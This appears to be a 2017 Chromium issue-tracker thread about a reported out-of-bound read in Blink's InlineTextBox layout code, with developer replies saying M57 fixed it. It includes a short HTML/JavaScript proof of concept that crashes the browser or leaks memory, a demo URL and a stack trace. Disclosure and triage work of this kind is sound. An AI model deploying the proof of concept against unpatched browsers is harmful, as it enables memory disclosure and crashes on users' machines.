Issue metadata
Sign in to add a comment
|
Out-of-bound read in layout
Reported by
mishra.d...@gmail.com,
Feb 23 2017
|
||||||||||||||||||||||||
Issue description
UserAgent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Steps to reproduce the problem:
Upstream:
671328
OR
1024 (Project Zero)
The browser crashes when the code is executed.
Crash ID Chrome (Server ID: caf853d300000000)
I am able to replicate the issue in Chrome Stable in Linux and Windows.
However, in Chromium InfoLeak works, Attaching the POC for reference.
What is the expected behavior?
What went wrong?
Code :
<style>
content { contain: size layout; }
</style>
<script>
function leak() {
document.execCommand("selectAll");
opt.text = "";
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>
Demo URL: http://hackies.in/testc.html
Did this work before? N/A
Chrome version: 56.0.2924.87 (64-bit) Channel: stable
OS Version: 6.1 (Windows 7, Windows Server 2008 R2)
Flash Version: Shockwave Flash 24.0 r0
,
Feb 23 2017
Sending to kojii who recently made a change in InlineTextBox::constructTextRun, can you please take a look?
,
Feb 23 2017
,
Feb 24 2017
,
Feb 24 2017
Hi koji, I am not able to view the Bug 671328 . Please correct me if I am wrong i saw the issue is been patched for Chrome 56 If i tried replicating it and it works so how it is an Dup. Please advise.
,
Feb 24 2017
Oh, sorry, I wasn't aware of that. In M56, this crash is intentional. When we compute offsets incorrectly, we crash before reading the memory. So this is a crash, but not out-of-bound read. The root cause (that computes offsets incorrectly) was fixed in 57.0.2957.0, so M57 should not crash.
,
Feb 24 2017
Okay, and the second POC is of Chrominium where it leaks data.
,
Feb 24 2017
What is "the second POC"?
,
Feb 24 2017
https://bugs.chromium.org/p/project-zero/issues/detail?id=1024 I believe my POC match's the same.
,
Feb 24 2017
I'm terribly sorry, I can't understand what you're saying. Probably I'm wrong person for you to talk to, but I also don't know whom to assign this bug to. +ifratric@, do you know terminologies this person uses? Do you understand what is discussed here?
,
Feb 24 2017
The bug in Project Zero and the POC which is attached in it, I was able to replicate the same in Chromium browser. Please have a look on the second POC of mine and The POC of PZ Bug : 1024 I hope i made a bit clear
,
Feb 24 2017
Hi, can you clarify what version of Chromium you managed to reproduce the infoleak in?
,
Feb 24 2017
In 55.0.2883.87 Built on Ubuntu.
,
Mar 2 2017
Our current stable release is 56.0.2924.87, and it looks like you used M56 to post this report. Is it possible to upgrade your Chromium to the latest?
,
Mar 3 2017
So, When I tried updating chromium and by running the above test case the chromium crashes stack traces below: ------ Chromium 56.0.2924.76 (Developer Build) Built on Ubuntu , running on Ubuntu 16.04 (64-bit) Revision 314da7cc1e56fc9fa9271bac2b029922feb4b6f2 OS Linux JavaScript V8 5.6.326.42 ------ Received signal 4 ILL_ILLOPN 7fffd94af6ef #0 0x7ffff78b602e base::debug::StackTrace::StackTrace() #1 0x7ffff78b6423 <unknown> #2 0x7ffff7bcb390 <unknown> #3 0x7fffd94af6ef blink::InlineTextBox::constructTextRun() #4 0x7fffd94afb00 blink::InlineTextBox::localSelectionRect() #5 0x7fffd9456dd4 blink::LayoutText::localSelectionRect() #6 0x7fffd9458fb5 blink::LayoutText::localVisualRect() #7 0x7fffd94811b9 blink::PaintInvalidationState::computeVisualRectInBacking() #8 0x7fffd9422444 blink::LayoutObject::invalidatePaintIfNeeded() #9 0x7fffd941fd94 blink::LayoutObject::invalidateTreeIfNeeded() #10 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded() #11 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded() #12 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded() #13 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded() #14 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded() #15 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded() #16 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded() #17 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded() #18 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded() #19 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded() #20 0x7fffd941ffbf blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded() #21 0x7fffd93c6242 blink::LayoutBoxModelObject::invalidateTreeIfNeeded() #22 0x7fffd90d48b4 blink::FrameView::invalidateTreeIfNeeded() #23 0x7fffd90d4b7b blink::FrameView::invalidateTreeIfNeededRecursiveInternal() #24 0x7fffd90d4c8c blink::FrameView::invalidateTreeIfNeededRecursive() #25 0x7fffd90d7acc blink::FrameView::updateLifecyclePhasesInternal() #26 0x7fffd956d24d blink::PageAnimator::updateAllLifecyclePhases() #27 0x7fffe624c997 blink::WebViewImpl::updateAllLifecyclePhases() #28 0x7fffefcd746b cc::ProxyMain::BeginMainFrame() #29 0x7fffefcdda7d <unknown> #30 0x7ffff78b7563 base::debug::TaskAnnotator::RunTask() #31 0x7fffe6756f7f blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue() #32 0x7fffe6757ae0 blink::scheduler::TaskQueueManager::DoWork() #33 0x7ffff78b7563 base::debug::TaskAnnotator::RunTask() #34 0x7ffff78dd760 base::MessageLoop::RunTask() #35 0x7ffff78df35d base::MessageLoop::DeferOrRunPendingTask() #36 0x7ffff78e01bd base::MessageLoop::DoWork() #37 0x7ffff78e05a9 base::MessagePumpDefault::Run() #38 0x7ffff78dcb42 base::MessageLoop::RunHandler() #39 0x7ffff79054d8 base::RunLoop::Run() #40 0x7ffff2516649 <unknown> #41 0x7ffff2608068 <unknown> #42 0x7ffff2608464 <unknown> #43 0x7ffff26078e1 content::ContentMain() #44 0x555555a6589c <unknown> #45 0x7fffe26ff830 __libc_start_main #46 0x555555a65769 <unknown> r8: 0000000000000000 r9: 0000000000000000 r10: 00000000000002d6 r11: 0000000000000009 r12: 0000000000000040 r13: 00007fffffffc0a0 r14: 0000000000000000 r15: 000025b111450000 di: 0000000000000060 si: 000025b111450000 bp: 00007fffffffc0a0 bx: 000032d41e005f30 dx: 000004d2e4ccc680 ax: 0000000000000001 cx: 0000000000000000 sp: 00007fffffffbfa0 ip: 00007fffd94af6ef efl: 0000000000010283 cgf: 0000000000000033 erf: 0000000000000000 trp: 0000000000000006 msk: 0000000000000000 cr2: 0000000000000000 [end of stack trace] [Thread 0x7fffc8d87700 (LWP 4925) exited]
,
Mar 3 2017
Yes, as noted in comment #6, M56 crashes before out-of-bound read. That is what issue 671328 fixed in M56; I mean, fixed to crash. M57 fixed the same in a different way, it doesn't crash. Is this satisfying for you, or is there anything more you need from us? Probably because I have little knowledge of what you work on, I don't know what we can do for you. Apologies for this difficult conversation.
,
Mar 3 2017
Okay sure, I got it Thank you Kojii.
,
Jun 2 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||||
Comment 1 by kerrnel@chromium.org
, Feb 23 2017